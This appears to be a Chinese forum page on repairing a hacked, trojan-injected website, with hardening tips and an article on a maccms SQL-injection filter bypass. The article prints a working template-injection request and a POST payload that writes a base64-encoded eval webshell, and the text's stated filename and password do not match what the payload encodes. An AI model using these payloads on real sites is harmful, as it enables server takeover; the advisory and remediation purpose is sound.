网站有漏洞怎么修复啊，我的网站被挂马了，怎么办？

Posted 2023-04-15

修补漏洞（修补网站漏洞也就是做一下网站安全。）

1、修改网站后台的用户名和密码及后台的默认路径。

2、更改数据库名,如果是ACCESS数据库，那文件的扩展名最好不要用mdb，改成ASP的，文件名也可以多几

个特殊符号。

3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。

4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。

5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。

6、写入一些防挂马代码，让框架代码等挂马无效。

7、禁用FSO权限也是一种比较绝的方法。

8、修改网站部分文件夹的读写权限。

9、如果你是自己的服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全

也是很有必要了！

 

 

建议楼主可以下载一个腾讯的电脑管家，进行实时监测，我现在电脑上用的就是这个安全软件，感觉不错，毕竟很专业。我给我爸爸妈妈的电脑也下载了这个，感觉挺方便。腾讯电脑管家的定位是安全软件，定期体检、及时修复漏洞、开启所有防护，
可以很好的保护电脑的安全，同时腾讯电脑管家拥有管理软件、查杀病毒木马、系统优化、账号保护、硬件检测、软件搬家等功能。还不错。。你可以试试，个人建议。。希望能帮到你，望采纳，谢谢

参考技术A 如果程序不是很大，可以自己比对以前程序的备份文件，然后就是修复，或者换个服务器，最好是独立服务器。也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业. 参考技术B 可以用一些漏扫工具去扫描一遍，然后根据给出的方案去做修复。 参考技术C 这个你要先用MDCSOFT SCAN检测漏洞，修复漏洞，然后用MDCSOFT-IPS来防御。 参考技术D 建议你多去漏洞平台逛逛 上面有的很多最新的漏洞资讯 如果你是企业用户更可以注册SRC 一般大家用的比较多的漏洞平台： 乌云 漏洞银行 漏洞盒子

网站***修复网站漏洞修复方案

网站***修复网站漏洞修复方案

分类专栏： 网站安全 网站被黑 centos运维 如何防止网站被侵入 如何防止网站被黑 如何防止网站被挂马 网站安全服务 怎么查找网站漏洞 web网站安全服务 dedecms老被挂马 该内容被禁止访问 网站被黑怎么修复 MetInfo漏洞修复 ecshop网站安全修补 wordpress漏洞修复 ecshop漏洞修复 dz论坛Discuz_X3.4最新网站漏洞 网站安全
版权
苹果cms系统，是目前很多电影网站都在使用的一套网站系统，开源，免费，扩展性较好，支持一键采集，伪静态化，高并发的同时承载，获得的很多站长的喜欢，于近日被网站安全检测发现，maccms存在网站漏洞，sql注入盲射获取数据库的管理员账号密码，关于该漏洞的详情，我们仔细分析看下.

maccms漏洞分析与修复

苹果CMS采用的是php语言开发的代码，使用的数据库是mysql类型，这种架构是比较常用的，也是比较稳定的，但是在安全方面出现的问题是比较多的，这次发现的是sql注入漏洞，在网站的根目录下的inc文件里的module目录下的vod.php代码如下图所示：

代码里的empty($wd函数，在进行判断如果是，或者不是的逻辑过程当中，会将前段用户访问带来的参数，进行安全过滤，我们跟进代码来追寻到苹果CMS的配置文件，在function.php配置文件代码李看到对网站的所有请求方式包括get、post、cookies的提交方式都强制性的进行了安全转义。网站漏洞问题的发生就在这里.

我们仔细又发现，maccms使用了360安全提供的防止sql注入拦截代码。360的防止sql注入是好几年前开发，并公开在网络上的，已经很久没有更新维护了并且还存在sql注入代码绕过的情况，参数值之间进行实体转换的时候，360的sql拦截规则没有对空白符以及反斜杠进行拦截，导致可以绕过插入恶意参数，直接请求到苹果cms后端数据库中去，获取苹果CMS的管理员账号密码。

我们来看下如何利用苹果CMS的漏洞，从上面漏洞发生的细节里可以看出，是因为拦截sql注入语句的过程中存在可以被绕过的漏洞。我们来使用%0b，以及空格对代码进行注入，sql语句在拼接中，可以插入反斜杠进行单引号的报错，从而绕过苹果CMS的安全拦截。语句如下：

GET请求：

http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}

可以直接看php的具体信息

POST请求

可以直接获取webshell

http://127.0.0.1/index.PHP?m=vod-search

POST内容如下：

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

可以直接生成带有一句话***后门的代码，文件名为safe.php,一句话***链接密码是safe.

如何修复苹果cms网站漏洞呢？

对网站漏洞的修复我们要知道漏洞产生的原因，以及为何会绕过苹果CMS的安全过滤，maccms使用的addslash安全函数，sql中没有加单引号的安全防护，in字句也很容易忘记加引号，再一个后期处理安全过滤的时候可以插入单引号，stripslash导致可以加入单引号，编解码导致绕过addslash，使用urldecode编码进行注入绕过，根据上面提出的漏洞绕过，我们SINE安全提出漏洞修复的建议是：对URL解码进行双层的转义，对get,post,cookies的拦截规则进行安全更新，加强空格，以及百分符号的拦截,如果对程序代码不熟悉的话建议咨询专业的网站安全公司来处理解决。